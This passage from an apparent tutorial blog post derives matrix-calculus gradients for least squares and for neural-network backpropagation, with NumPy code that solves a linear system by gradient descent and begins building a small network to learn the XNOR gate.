\begin{bmatrix}
\pv{y}{{\mathbf{x}}_{1}} & \pv{y}{{\mathbf{x}}_{2}} & \cdots & \pv{y}{{\mathbf{x}}_{n}}
\end{bmatrix}
$$

Well, both actually can work (even if you think of a vector as a column vector); the first version is called the denominator layout and the second one is called the numerator layout. They are transposes of each other. For gradient descent, the denominator layout is more natural, because in standard practice we think of a vector as a column vector. I also prefer the denominator layout. However, the numerator layout follows the rules of single-variable calculus more closely and will be much easier to follow. For example, matrices do not have commutative multiplication, so the direction in which you chain terms matters: we naturally think of chaining terms to the back, which is true for the numerator layout, but in the denominator layout terms are chained to the front. The product rule also gets funnier in the denominator layout. So moving forward, we will stick with the numerator layout and transpose the matrix or vector once the derivative is found. We will also stick to column vectors.

First, let's look at the $A\mathbf{x}-\mathbf{b}$ term, and we will see why the derivative comes out the way it does with a simple $2 \times 2$ case. $A\mathbf{x}-\mathbf{b}$ is an $f:\mathbb{R}^{n} \rightarrow \mathbb{R}^{n}$, and hence the derivative will be a matrix (known as the Jacobian to many). Let's first see the general equation and work it out for every value.

$$
\begin{aligned}
\mathbf{y} &= A\mathbf{x}-\mathbf{b} \\
&=
\begin{bmatrix}
{a}_{11} & {a}_{12} \\
{a}_{21} & {a}_{22}
\end{bmatrix}
\begin{bmatrix}
{\mathbf{x}}_{1} \\
{\mathbf{x}}_{2}
\end{bmatrix}
-
\begin{bmatrix}
{\mathbf{b}}_{1} \\
{\mathbf{b}}_{2}
\end{bmatrix} \\
&=
\begin{bmatrix}
{a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1} \\
{a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2}
\end{bmatrix}
\end{aligned}
$$

Now we calculate the Jacobian (remember that it is transposed) by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial \mathbf{y}}{\partial \mathbf{x}} &=
\begin{bmatrix}
\frac{\partial {\mathbf{y}}_{1}}{\partial{\mathbf{x}}_{1}} & \frac{\partial {\mathbf{y}}_{1}}{\partial{\mathbf{x}}_{2}}\\
\frac{\partial {\mathbf{y}}_{2}}{\partial{\mathbf{x}}_{1}} & \frac{\partial {\mathbf{y}}_{2}}{\partial{\mathbf{x}}_{2}}
\end{bmatrix} \\
\frac{\partial {\mathbf{y}}_{1}}{\partial{\mathbf{x}}_{1}} &= {a}_{11}\\
\frac{\partial {\mathbf{y}}_{1}}{\partial{\mathbf{x}}_{2}} &= {a}_{12}\\
\frac{\partial {\mathbf{y}}_{2}}{\partial{\mathbf{x}}_{1}} &= {a}_{21}\\
\frac{\partial {\mathbf{y}}_{2}}{\partial{\mathbf{x}}_{2}} &= {a}_{22}\\
\frac{\partial \mathbf{y}}{\partial \mathbf{x}} &=
\begin{bmatrix}
{a}_{11} & {a}_{12}\\
{a}_{21} & {a}_{22}
\end{bmatrix}
= A
\end{aligned}
$$

We see that this mirrors the single-variable case: if $f(x)=ax$ with $a$ constant, then $f'(x)=a$.
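As a sanity check (my own, not part of the original derivation), we can verify numerically that the Jacobian of $\mathbf{y}=A\mathbf{x}-\mathbf{b}$ is $A$, using central finite differences:

```python
import numpy as np

# Numerically verify that the Jacobian of y = A x - b equals A.
rng = np.random.default_rng(0)
A = rng.standard_normal((2, 2))
b = rng.standard_normal((2, 1))

def f(x):
    return A @ x - b

x0 = rng.standard_normal((2, 1))
eps = 1e-6
J = np.zeros((2, 2))
for j in range(2):
    e = np.zeros((2, 1)); e[j] = eps
    # central difference along coordinate j gives column j of the Jacobian
    J[:, j] = ((f(x0 + e) - f(x0 - e)) / (2 * eps)).ravel()

assert np.allclose(J, A)
```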

Now we look at the vertical bars and the "2"s. This is a common function known as the Euclidean norm or 2-norm.

$$
|{\mathbf {x}}|_{2}:={\sqrt {x_{1}^{2}+\cdots +x_{n}^{2}}}
$$

We then square it, giving rise to the second "2". Now we define $\mathbf{y}=A\mathbf{x}-\mathbf{b}$ and do the same thing we did before: $|{\mathbf {y}}|_{2}^{2}$ is an $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$, hence the derivative is a row vector.

$$
\begin{aligned}
z&=|{\mathbf {y}}|_{2}^{2}\\
&={\mathbf {y}}_{1}^{2} + {\mathbf {y}}_{2}^{2}
\end{aligned}
$$

Now we calculate the Gradient (remember that it is transposed) by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial F(\mathbf{x})}{\partial\mathbf{y}} &=
\begin{bmatrix}
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}_{1}} & \frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}_{2}}
\end{bmatrix} \\
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}_{1}} &= 2\mathbf{y}_{1} \\
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}_{2}} &= 2\mathbf{y}_{2} \\
\frac{\partial F(\mathbf{x})}{\partial\mathbf{y}} &=
\begin{bmatrix}
2\mathbf{y}_{1} & 2\mathbf{y}_{2}
\end{bmatrix}
= 2\mathbf{y}^{T}
\end{aligned}
$$

To illustrate the chain rule, I will calculate it individually and put it all together.

$$
\begin{aligned}
F(\mathbf{x}) &= {||A\mathbf{x}-\mathbf{b}||}_{2}^{2} \\
&= {({a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1})}^{2} +
{({a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2})}^{2}
\end{aligned}
$$

Now we calculate the Final Gradient by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial F(\mathbf{x})}{\partial\mathbf{x}} &=
\begin{bmatrix}
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}_{1}} & \frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}_{2}}
\end{bmatrix}\\
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}_{1}} &= 2{a}_{11}({a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1}) + 2{a}_{21}({a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2})\\
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}_{2}} &= 2{a}_{12}({a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1}) + 2{a}_{22}({a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2})\\
\frac{\partial F(\mathbf{x})}{\partial\mathbf{x}} &=
\begin{bmatrix}
2{a}_{11}({a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1}) + 2{a}_{21}({a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2}) & 2{a}_{12}({a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1}) + 2{a}_{22}({a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2})
\end{bmatrix}\\
&= 2
\begin{bmatrix}
{a}_{11}{\mathbf{x}}_{1} + {a}_{12}{\mathbf{x}}_{2}-{\mathbf{b}}_{1} &
{a}_{21}{\mathbf{x}}_{1} + {a}_{22}{\mathbf{x}}_{2}-{\mathbf{b}}_{2}
\end{bmatrix}
\begin{bmatrix}
{a}_{11} & {a}_{12} \\
{a}_{21} & {a}_{22}
\end{bmatrix} = 2{(A\mathbf{x}-\mathbf{b})}^{T}A
\end{aligned}
$$

As we can see from that last step, the expression is pretty complex, but you can see how neat matrix notation is compared to writing all of that out, and you get a feel for how matrix calculus works. With the numerator layout it is very similar to single-variable calculus, just with a few extra steps.
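The derived formula can also be spot-checked numerically (a hedged check of my own, not from the original post): compare the closed-form gradient $2(A\mathbf{x}-\mathbf{b})^{T}A$ against central finite differences of $F(\mathbf{x})$.

```python
import numpy as np

# Compare the analytic gradient of F(x) = ||A x - b||^2 with finite differences.
rng = np.random.default_rng(1)
A = rng.standard_normal((2, 2))
b = rng.standard_normal((2, 1))
x0 = rng.standard_normal((2, 1))

F = lambda x: float(np.linalg.norm(A @ x - b) ** 2)
analytic = 2 * (A @ x0 - b).T @ A          # numerator-layout row vector

eps = 1e-6
numeric = np.zeros((1, 2))
for j in range(2):
    e = np.zeros((2, 1)); e[j] = eps
    numeric[0, j] = (F(x0 + e) - F(x0 - e)) / (2 * eps)

assert np.allclose(analytic, numeric, atol=1e-5)
```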

I then transpose the derivative back into the denominator layout, written below. The step function is also written below, which we will use for gradient descent.

$$
\begin{aligned}
F(\mathbf{x}) &= {||A\mathbf{x}-\mathbf{b}||}^{2} \\
\nabla F(\mathbf {x} ) &= 2 A^{T}(A\mathbf {x} -\mathbf{b}) \\
\mathbf{x}_{n+1} &= \mathbf{x}_{n}-\gamma \nabla F(\mathbf {x}_{n})
\end{aligned}
$$

where $\gamma$ is the learning rate. We need a small learning rate to prevent the iteration from taking overly large steps, since objective functions tend to exaggerate the "true" error of a function.

We can now implement this in code form for a very simple linear system written below:

$$
\begin{aligned}
w+3x+2y-z&=9\\
5w+2x+y-2z&=4\\
x+2y+4z&=24\\
w+x-y-3z&=-12
\end{aligned}
$$

This can be written as such in matrix form:

$$
\begin{bmatrix} 1 & 3 & 2 & -1\\ 5 & 2 & 1 & -2\\ 0 & 1 & 2 & 4\\ 1 & 1 & -1 & -3 \end{bmatrix}
\begin{bmatrix} w\\ x\\ y\\ z \end{bmatrix}
=
\begin{bmatrix} 9\\ 4\\ 24\\ -12 \end{bmatrix}
$$

$$ A= \begin{bmatrix} 1 & 3 & 2 & -1\\ 5 & 2 & 1 & -2\\ 0 & 1 & 2 & 4\\ 1 & 1 & -1 & -3 \end{bmatrix} $$

```
>>> A = np.array([[1,3,2,-1],[5,2,1,-2],[0,1,2,4],[1,1,-1,-3]], dtype=np.float64)
>>> A
array([[ 1.,  3.,  2., -1.],
       [ 5.,  2.,  1., -2.],
       [ 0.,  1.,  2.,  4.],
       [ 1.,  1., -1., -3.]])
```

$$ \mathbf{b}= \begin{bmatrix} 9\\ 4\\ 24\\ -12 \end{bmatrix} $$

```
>>> b = np.array([[9],[4],[24],[-12]], dtype=np.float64)
>>> b
array([[  9.],
       [  4.],
       [ 24.],
       [-12.]])
```

$$ \mathbf{x}= \begin{bmatrix} w\\ x\\ y\\ z \end{bmatrix} $$

```
>>> x = np.random.rand(4,1)
>>> x
array([[0.09257854],
       [0.16847643],
       [0.39120624],
       [0.78484474]])
```

$$ F(\mathbf{x}) = {||A\mathbf{x}-\mathbf{b}||}^{2} $$

```
>>> def objective_function(x):
...     return np.linalg.norm(np.matmul(A,x) - b) ** 2
```

$$ \nabla F(\mathbf {x} )=2A^{T}(A\mathbf {x} -\mathbf {b}) $$

```
>>> def objective_function_derivative(x):
...     return 2 * np.matmul(A.T, np.matmul(A,x) - b)
```

In this case, I implemented an arbitrary learning rate and an arbitrary step count. In traditional, non-machine-learning gradient descent, the learning rate changes per step and is determined via a heuristic such as the Barzilai–Borwein method; however, this is not necessary here, as gradient descent is very robust. I used a fixed step count for simplicity, but you should ideally use some sort of boolean condition to break the loop, such as $F(\mathbf{x})<0.01$.
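The tolerance-based stopping mentioned above can be sketched as follows (the cap on iterations is my own safety guard, not part of the original post):

```python
import numpy as np

# Gradient descent that stops once F(x) <= 0.01, as the text recommends,
# using the same system A x = b as in the example.
A = np.array([[1, 3, 2, -1], [5, 2, 1, -2], [0, 1, 2, 4], [1, 1, -1, -3]], dtype=np.float64)
b = np.array([[9], [4], [24], [-12]], dtype=np.float64)

F = lambda x: float(np.linalg.norm(A @ x - b) ** 2)
grad_F = lambda x: 2 * A.T @ (A @ x - b)

x = np.random.rand(4, 1)
learning_rate = 0.01
steps = 0
while F(x) > 0.01 and steps < 100_000:   # boolean stopping condition
    x -= learning_rate * grad_F(x)
    steps += 1

assert F(x) <= 0.01
```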

$$
\mathbf {x}_{n+1}=\mathbf {x}_{n}-\gamma \nabla F(\mathbf {x}_{n})
$$

```
>>> learning_rate = 0.01
>>> for i in range(5000):
...     x -= learning_rate * objective_function_derivative(x)
...
>>> x
array([[1.],
       [2.],
       [3.],
       [4.]])
```

And to check, we now use a simple matrix multiplication:

```
>>> np.matmul(A,x)
array([[  9.],
       [  4.],
       [ 24.],
       [-12.]])
```

Voila, we have solved the system with gradient descent, and the solution is extremely close to exact. This shows the power of gradient descent.
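Since this particular system is square with a unique solution, we can also cross-check the gradient-descent answer against a direct solver (my own verification, not in the original post):

```python
import numpy as np

# Solve the same system A x = b directly and compare with the known answer.
A = np.array([[1, 3, 2, -1], [5, 2, 1, -2], [0, 1, 2, 4], [1, 1, -1, -3]], dtype=np.float64)
b = np.array([[9], [4], [24], [-12]], dtype=np.float64)
x_direct = np.linalg.solve(A, b)
assert np.allclose(x_direct.ravel(), [1.0, 2.0, 3.0, 4.0])
```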

To understand the math behind a deep neural network layer, we will first look at the single perceptron case.

$$
\begin{aligned}
z&=xw+b\\
a&=\sigma (z)
\end{aligned}
$$

where $w$ is the weight, $b$ is the bias, $x$ is the input, $\sigma$ is the activation function and $a$ is the output.

We assume that this is a single layer network and that the loss function is just applied after, and we will just use the MSE loss.

$$c = {(a-y)}^2$$

where $y$ is the true output and $c$ is the cost.

In this case, it is quite easy to represent. Let us expand it to a layer with 4 input neurons and 4 output neurons.

$$
\begin{aligned}
{w}_{11}{x}_{1} + {w}_{21}{x}_{2} + {w}_{31}{x}_{3} + {w}_{41}{x}_{4} + {b}_{1} &= {z}_{1}\\
{w}_{12}{x}_{1} + {w}_{22}{x}_{2} + {w}_{32}{x}_{3} + {w}_{42}{x}_{4} + {b}_{2} &= {z}_{2}\\
{w}_{13}{x}_{1} + {w}_{23}{x}_{2} + {w}_{33}{x}_{3} + {w}_{43}{x}_{4} + {b}_{3} &= {z}_{3}\\
{w}_{14}{x}_{1} + {w}_{24}{x}_{2} + {w}_{34}{x}_{3} + {w}_{44}{x}_{4} + {b}_{4} &= {z}_{4}\\
{a}_{1}&=\sigma({z}_{1})\\
{a}_{2}&=\sigma({z}_{2})\\
{a}_{3}&=\sigma({z}_{3})\\
{a}_{4}&=\sigma({z}_{4})\\
c &= \frac{1}{4} \left((a_1-y_1)^2 + (a_2 - y_2)^2 + (a_3 - y_3)^2 + (a_4 - y_4)^2\right)
\end{aligned}
$$

As you can see, this is just a linear system much like the one shown in the example, and it becomes very simple.

$$
\begin{aligned}
\mathbf{z} &= W\mathbf{x} + \mathbf{b}\\
\mathbf{a} &= \sigma(\mathbf{z}) \\
c &= \frac{1}{n} ||\mathbf{a} - \mathbf{y}||^2_2
\end{aligned}
$$

From our work earlier we know that:

$$
\begin{aligned}
\frac{\partial \mathbf{z}}{\partial \mathbf{b}}&=I \\
\frac{\partial \mathbf{z}}{\partial \mathbf{x}}&= W \\
\frac{\partial c}{\partial \mathbf{a}} &= \frac{2}{n} \left(\mathbf{a} - \mathbf{y} \right)^\text{T}
\end{aligned}
$$

However, we have once again hit a speedbump. How do we find the derivative of a vector $\mathbf{z}$ with respect to a matrix $W$? The function is of the form $f:\mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m}$, so the derivative will be a third-order tensor (colloquially, a 3D matrix). For now, we will use a trick to dodge third-order tensors, exploiting the structure of the function $W\mathbf{x}$. For this example I use $m=3$ and $n=2$, but it generalizes to any size.

$$
\begin{aligned}
\mathbf{z} &= W\mathbf{x} + \mathbf{b}\\
\begin{bmatrix}
{\mathbf{z}}_{1} \\
{\mathbf{z}}_{2} \\
{\mathbf{z}}_{3}
\end{bmatrix} &= \begin{bmatrix}
{w}_{11} & {w}_{12}\\
{w}_{21} & {w}_{22}\\
{w}_{31} & {w}_{32}
\end{bmatrix}
\begin{bmatrix}
{\mathbf{x}}_{1} \\
{\mathbf{x}}_{2}
\end{bmatrix}
+
\begin{bmatrix}
{\mathbf{b}}_{1} \\
{\mathbf{b}}_{2} \\
{\mathbf{b}}_{3}
\end{bmatrix} \\
&=
\begin{bmatrix}
{w}_{11}{\mathbf{x}}_{1} + {w}_{12}{\mathbf{x}}_{2} + {\mathbf{b}}_{1}\\
{w}_{21}{\mathbf{x}}_{1} + {w}_{22}{\mathbf{x}}_{2} + {\mathbf{b}}_{2}\\
{w}_{31}{\mathbf{x}}_{1} + {w}_{32}{\mathbf{x}}_{2} + {\mathbf{b}}_{3}
\end{bmatrix}
\end{aligned}
$$

We now calculate the individual derivatives of $\mathbf{z}$ with respect to $W$.

$$
\begin{aligned}
\frac{\partial \mathbf{z}_{1}}{\partial w_{11}}=\mathbf{x}_{1}\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{11}}=0\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{11}}=0\\
\frac{\partial \mathbf{z}_{1}}{\partial w_{12}}=\mathbf{x}_{2}\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{12}}=0\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{12}}=0\\
\frac{\partial \mathbf{z}_{1}}{\partial w_{21}}=0\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{21}}=\mathbf{x}_{1}\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{21}}=0\\
\frac{\partial \mathbf{z}_{1}}{\partial w_{22}}=0\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{22}}=\mathbf{x}_{2}\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{22}}=0\\
\frac{\partial \mathbf{z}_{1}}{\partial w_{31}}=0\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{31}}=0\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{31}}=\mathbf{x}_{1}\\
\frac{\partial \mathbf{z}_{1}}{\partial w_{32}}=0\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{32}}=0\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{32}}=\mathbf{x}_{2}
\end{aligned}
$$

We see that this is a pretty complex-looking tensor, but a majority of the values are 0, which lets us pull off an epic hack: at the end, we are essentially trying to get a single scalar value (the loss) and find its partial derivative with respect to $W$. There are some steps involved in getting from $\mathbf{z}$ to $c$, but for simplicity, instead of showing everything, we condense all of this into a function $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$ defined by $c=f(\mathbf{z})$. In this case, we know the tensor values, the gradient, and what the derivative should be. Hence, we now just evaluate it and see if we can spot any property:

$$
\begin{aligned}
\frac{\partial c}{\partial w_{ij}} &= \frac{\partial c}{\partial{\mathbf{z}}_{i}}\frac{\partial {\mathbf{z}}_{i}}{\partial w_{ij}} = \frac{\partial c}{\partial{\mathbf{z}}_{i}}\mathbf{x}_{j}\\
\frac{\partial c}{\partial W} &=
\begin{bmatrix}
\frac{\partial c}{\partial{\mathbf{z}}_{1}}\mathbf{x}_{1} & \frac{\partial c}{\partial{\mathbf{z}}_{2}}\mathbf{x}_{1} & \frac{\partial c}{\partial{\mathbf{z}}_{3}}\mathbf{x}_{1}\\
\frac{\partial c}{\partial{\mathbf{z}}_{1}}\mathbf{x}_{2} & \frac{\partial c}{\partial{\mathbf{z}}_{2}}\mathbf{x}_{2} & \frac{\partial c}{\partial{\mathbf{z}}_{3}}\mathbf{x}_{2}
\end{bmatrix}
=
\mathbf{x}\frac{\partial c}{\partial\mathbf{z}}
\end{aligned}
$$

Wonderful, we have just found this amazing method where we just add $\mathbf{x}$ to the front. Normally this is not possible, but it works in this special case because we don't have to consider terms such as $\frac{\partial c}{\partial{\mathbf{z}}_{2}}\frac{\partial {\mathbf{z}}_{2}}{\partial{w}_{11}}$, which are just 0. It helps us dodge all the possibilities of tensor calculus (at least for now) and makes the NumPy multiplication much easier. $f$ also generalizes to any vector-to-scalar function, not just the specific steps we take.

The next speedbump is much easier to grasp than the last one: element-wise operations. In this case, we have the activation function $\sigma:\mathbb{R}^{n} \rightarrow \mathbb{R}^{n}$ (or $\sigma:\mathbb{R} \rightarrow \mathbb{R}$), which looks like the sigmoid function, but this is just a placeholder. It can be any $\mathbb{R}$ to $\mathbb{R}$ activation function, such as $\text{ReLU}(x) = \max(x, 0)$, or whatever else has been found in research, such as SmeLU and GELU. Once again, we work it out for every single value, as shown below:

$$
\begin{aligned}
\mathbf{a} &= \sigma(\mathbf{z})\\
\begin{bmatrix}
{\mathbf{a}}_{1} \\
{\mathbf{a}}_{2} \\
{\mathbf{a}}_{3}
\end{bmatrix}
&=
\begin{bmatrix}
\sigma({\mathbf{z}}_{1}) \\
\sigma({\mathbf{z}}_{2}) \\
\sigma({\mathbf{z}}_{3})
\end{bmatrix}
\end{aligned}
$$

Now, for the 48-billionth time, we calculate the Jacobian by computing every individual derivative to get the general property of the operation.

$$
\begin{aligned}
\frac{\partial \mathbf{a}}{\partial \mathbf{z}} &=
\begin{bmatrix}
\frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{1}} & \frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{2}} & \frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{3}}\\
\frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{1}} & \frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{2}} & \frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{3}}\\
\frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{1}} & \frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{2}} & \frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{3}}
\end{bmatrix}\\
\frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{1}}=\sigma'(\mathbf{z}_{1})\quad
\frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{2}}&=0\quad
\frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{3}}=0\\
\frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{1}}=0\quad
\frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{2}}&=\sigma'(\mathbf{z}_{2})\quad
\frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{3}}=0\\
\frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{1}}=0\quad
\frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{2}}&=0\quad
\frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{3}}=\sigma'(\mathbf{z}_{3})\\
\frac{\partial \mathbf{a}}{\partial \mathbf{z}} &=
\begin{bmatrix}
\sigma'(\mathbf{z}_{1}) & 0 & 0\\
0 & \sigma'(\mathbf{z}_{2}) & 0\\
0 & 0 & \sigma'(\mathbf{z}_{3})
\end{bmatrix}
=\operatorname{diag}(\sigma'(\mathbf{z}))
\end{aligned}
$$

As you can see, we can reduce this derivative to this specific form. I have used the $\operatorname{diag}$ operator, which converts a vector into a diagonal matrix. Finally, after all this derivation (mathematically and figuratively), we can use the chain rule to join everything together:

$$
\begin{aligned}
\frac{\partial c}{\partial \mathbf{b}}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial \mathbf{b}} &= \frac{2}{n}{(\mathbf{a}-\mathbf{y})}^{T}\operatorname{diag}(\sigma'(\mathbf{z}))\\
\frac{\partial c}{\partial \mathbf{x}}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial \mathbf{x}} &= \frac{2}{n}{(\mathbf{a}-\mathbf{y})}^{T}\operatorname{diag}(\sigma'(\mathbf{z}))W\\
\frac{\partial c}{\partial W}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial W} &= \frac{2}{n}\mathbf{x}{(\mathbf{a}-\mathbf{y})}^{T}\operatorname{diag}(\sigma'(\mathbf{z}))
\end{aligned}
$$
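These chain-rule results can be spot-checked numerically. The following is my own verification (not part of the original derivation), using the same $3$-output / $2$-input shapes: it compares the closed-form $\frac{\partial c}{\partial W}=\mathbf{x}\frac{\partial c}{\partial\mathbf{z}}$ against finite differences over every entry of $W$.

```python
import numpy as np

# Verify dc/dW = x @ (dc/dz) for c = (1/n) ||sigmoid(W x + b) - y||^2.
rng = np.random.default_rng(0)
W = rng.standard_normal((3, 2)); b = rng.standard_normal((3, 1))
x = rng.standard_normal((2, 1)); y = rng.standard_normal((3, 1))
n = 3
sigmoid = lambda t: 1 / (1 + np.exp(-t))

def cost(W_, b_):
    a = sigmoid(W_ @ x + b_)
    return float(np.sum((a - y) ** 2)) / n

z = W @ x + b
a = sigmoid(z)
sig_prime = sigmoid(z) * (1 - sigmoid(z))
dc_dz = (2 / n) * (a - y).T @ np.diag(sig_prime.ravel())   # row vector, numerator layout
dc_dW = x @ dc_dz                                          # the "x in front" trick

# central finite differences over every weight entry
eps = 1e-6
numeric = np.zeros_like(dc_dW)
for i in range(3):
    for j in range(2):
        Wp, Wm = W.copy(), W.copy()
        Wp[i, j] += eps; Wm[i, j] -= eps
        numeric[j, i] = (cost(Wp, b) - cost(Wm, b)) / (2 * eps)

assert np.allclose(dc_dW, numeric, atol=1e-5)
```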

Now that we have these simple definitions for the single-layer case, we can expand to the multi-layer case.

$$
\begin{aligned}
\mathbf{a}_{0}&=\mathbf{x}\\
\mathbf{z}_{i}&={W}_{i-1}{\mathbf{a}}_{i-1} + \mathbf{b}_{i-1}\\
\mathbf{a}_{i}&=\sigma(\mathbf{z}_{i})\\
i &= 1,2,3,\ldots,L\\
c&=\frac{1}{n}{||\mathbf{a}_{L}-\mathbf {y}||}_{2}^{2}
\end{aligned}
$$

We can do the calculus for the $i$-th layer now, specifically for bias and weight using the chain rule.

$$
\begin{aligned}
\frac{\partial c}{\partial \mathbf{b}_{i-1}}=\frac{\partial c}{\partial \mathbf{a}_{L}}\frac{\partial \mathbf{a}_{L}}{\partial \mathbf{z}_{L}}\frac{\partial \mathbf{z}_{L}}{\partial \mathbf{a}_{L-1}}\cdots\frac{\partial \mathbf{a}_{i}}{\partial \mathbf{z}_{i}}\frac{\partial \mathbf{z}_{i}}{\partial \mathbf{b}_{i-1}}&=
\frac{2}{n}{(\mathbf{a}_{L}-\mathbf{y})}^{T}\operatorname{diag}(\sigma'(\mathbf{z}_{L}))W_{L-1}\cdots \operatorname{diag}(\sigma'(\mathbf{z}_{i}))\\
\frac{\partial c}{\partial W_{i-1}}=\frac{\partial c}{\partial \mathbf{a}_{L}}\frac{\partial \mathbf{a}_{L}}{\partial \mathbf{z}_{L}}\frac{\partial \mathbf{z}_{L}}{\partial \mathbf{a}_{L-1}}\cdots\frac{\partial \mathbf{a}_{i}}{\partial \mathbf{z}_{i}}\frac{\partial \mathbf{z}_{i}}{\partial W_{i-1}}&=
\frac{2}{n}\mathbf{a}_{i-1}{(\mathbf{a}_{L}-\mathbf{y})}^{T}\operatorname{diag}(\sigma'(\mathbf{z}_{L}))W_{L-1}\cdots \operatorname{diag}(\sigma'(\mathbf{z}_{i}))
\end{aligned}
$$

Now it is time to actually implement this network (finally).

I couldn't find a good but small dataset, because most people really do like large datasets and are infuriated when they are not provided one, like ~~entitled brats~~ normal people. So, instead, I decided that we will train our neural network to mimic the XNOR gate.

Oh no! Training? Testing? What is that? In all fairness, I am simply trying to show you that the mathematical functions that dictate neural networks, as derived above, fit this task perfectly, and that the neural networks everyone hears about really can mimic just about any function.

For those who do not know, the XNOR gate outputs 1 exactly when its two inputs are equal; its input/output pairs are coded out below. It is pretty suitable for this example, because the inputs and outputs are all 0s and 1s, hence it is fast to train and there is no bias in the data.

From here, let's try coding out the (x,y) pairs in NumPy:

```
data = [[np.array([[0],[0]], dtype=np.float64), np.array([[1]], dtype=np.float64)],
        [np.array([[0],[1]], dtype=np.float64), np.array([[0]], dtype=np.float64)],
        [np.array([[1],[0]], dtype=np.float64), np.array([[0]], dtype=np.float64)],
        [np.array([[1],[1]], dtype=np.float64), np.array([[1]], dtype=np.float64)]]
```

We then define a network structure. It doesn't have to be too complex because it is a pretty simple function. I decided on a $2 \rightarrow 3 \rightarrow 1$ multi-layer perceptron (MLP) structure, with the sigmoid activation function.

Next, let's try coding out our mathematical work based on the following class:

```
class NNdata:
    def __init__(self):
        self.a_0 = None
        self.W_0 = np.random.rand(3,2)
        self.b_0 = np.random.rand(3,1)
        self.z_1 = None
        self.a_1 = None
        self.W_1 = np.random.rand(1,3)
        self.b_1 = np.random.rand(1,1)
        self.z_2 = None
        self.a_2 = None
        self.db_1 = None
        self.dw_1 = None
        self.db_0 = None
        self.dw_0 = None

    def sigmoid(self, x):
        return 1 / (1 + np.exp(-x))

    def sigmoid_derivative(self, x):
        return self.sigmoid(x) * (1 - self.sigmoid(x))

    def feed_forward(self, x):
        self.a_0 = x
        self.z_1 = np.matmul(self.W_0, self.a_0) + self.b_0
        self.a_1 = self.sigmoid(self.z_1)
        self.z_2 = np.matmul(self.W_1, self.a_1) + self.b_1
        self.a_2 = self.sigmoid(self.z_2)
        return self.a_2

    def loss(self, y):
        return np.linalg.norm(self.a_2 - y) ** 2

    def back_prop(self, y):
        dcdz_2 = 2 * np.matmul((self.a_2 - y).T, np.diag(self.sigmoid_derivative(self.z_2).reshape(1)))
        dcdb_1 = dcdz_2
        dcdw_1 = np.matmul(self.a_1, dcdz_2)
